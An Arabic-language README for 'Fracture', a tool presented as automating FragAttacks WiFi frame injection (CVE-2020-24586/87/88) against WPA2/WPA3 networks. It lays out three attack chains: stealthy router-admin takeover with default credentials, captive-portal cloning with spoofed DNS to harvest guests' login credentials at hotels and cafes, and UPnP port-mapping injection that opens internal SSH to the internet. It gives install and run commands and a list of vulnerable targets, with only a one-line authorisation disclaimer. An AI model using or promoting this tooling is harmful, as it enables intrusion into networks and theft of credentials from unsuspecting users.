
FragAttacks إطار اختراق WiFi — CVE-2020-24586/87/88
FragAttacks إطار اختراق WiFi
CVE-2020-24586 / CVE-2020-24587 / CVE-2020-24588
تقوم Fracture بأتمتة ثلاث سلاسل هجوم جديدة عبر حقن إطارات 802.11. تستغل ثغرة تجميع A-MSDU في WPA2/WPA3 لحقن إطارات نصية عشوائية في شبكات مشفرة — دون معرفة كلمة المرور.
للاستخدام في اختبار الاختراق المصرح به فقط. استخدمها فقط ضد الشبكات التي تملكها أو لديك إذن كتابي صريح لاختبارها.
علامة وجود A-MSDU في التحكم في جودة الخدمة 802.11 غير مغطاة بمصادقة CCMP/GCMP. من خلال تعيين هذه العلامة في إطار مفبرك، يتسبب المهاجم في تفسير المتلقي للحمولة كإطار إيثرنت داخلي، متجاوزًا التشفير بالكامل.
تستخدم Fracture هذه البدائية لتشغيل ثلاثة مسارات هجوم:
يحقن طلبات HTTP مباشرة إلى واجهة إدارة جهاز التوجيه (192.168.x.1 والمتغيرات الشائعة) من خارج الشبكة. يحاول استخدام بيانات الاعتماد الافتراضية ونقاط نهاية CVE المعروفة غير الموثقة عبر برامج TP-Link و D-Link و Netgear و ASUS. صامت — لا إنكار للخدمة، لا توقيع قابل للكشف.
يكتشف شبكات البوابة المقيدة، ويستنسخ صفحة البوابة، ثم يحقن استجابات DNS مزيفة لإعادة توجيه العملاء المتصلين. عندما يقدم عميل بيانات اعتماد إلى النسخة، تلتقطها Fracture وتستخدمها للمصادقة بشكل شرعي. يستهدف شبكات WiFi في الفنادق، شبكات الضيوف للشركات، نقاط اتصال المقاهي.
يحقن أوامر اكتشاف UPnP SSDP و SOAP AddPortMapping. معظم أجهزة التوجيه المنزلية تقبلها دون مصادقة. إذا نجح، يفتح منفذًا خارجيًا على واجهة WAN لجهاز التوجيه مُعاد توجيهه إلى SSH عميل داخلي — مما يوفر وصولًا داخليًا من أي مكان دون الحاجة إلى كلمة مرور WiFi.
sudo apt install python3-scapy python3-requests python3-bs4 python3-flask
git clone https://github.com/fracture-wifi/fracture
cd fracture
sudo pip3 install -e . --break-system-packages
بعد التثبيت، يصبح fracture متاحًا كأمر نظام.
# ضع المحول في وضع المراقبة أولاً
sudo iwconfig wlan1 mode monitor
# تلقائي كامل — مسح، اختر الهدف، شغّل جميع المسارات المناسبة
sudo fracture -i wlan1
# مسح فقط — لا هجمات
sudo fracture -i wlan1 --scan-only
# التقييد بهدف معين
sudo fracture -i wlan1 -t AA:BB:CC:DD:EE:FF
# فرض مسار معين
sudo fracture -i wlan1 --path 1 # إدارة الراوتر
sudo fracture -i wlan1 --path 2 # جمع البوابة
sudo fracture -i wlan1 --path 3 # UPnP
# سجل حقن مفصل
sudo fracture -i wlan1 -v
# تعليمات مفصلة
sudo fracture --about
| الهدف | السبب |
|---|---|
| أجهزة التوجيه المنزلية (TP-Link, D-Link, Netgear, ASUS) |
المعدات المؤسسية (Cisco, Aruba, Ruckus, Ubiquiti) عادة ما تكون مصححة.
fracture/
├── fracture/
│ ├── __init__.py الإصدار، البيانات الوصفية
│ ├── __main__.py نقطة الدخول، التنسيق
│ ├── tui.py واجهة المستخدم الطرفية، الألوان، الجداول
│ ├── scanner.py اكتشاف القنوات المتغيرة للعملاء/نقاط الوصول
│ ├── injector.py محرك إطارات FragAttacks (CVE-2020-24588)
│ ├── portal.py اكتشاف البوابة، الاستنساخ، خادم بيانات الاعتماد
│ └── paths.py سلاسل الهجوم الثلاث
├── setup.py
└── README.md
MIT
| البرامج الثابتة الأصلية، بيانات الاعتماد الافتراضية، UPnP مفعل |
| أجهزة إنترنت الأشياء | تقريبًا لم يتم تصحيحها بعد 2021 |
| شبكات البوابة المقيدة | WiFi الفنادق/المقاهي مصمم حول تقديم بيانات الاعتماد |
| نواة لينكس < 5.12.4 | نواة قبل التصحيح |
| ويندوز قبل يونيو 2021 | نظام تشغيل قبل التصحيح |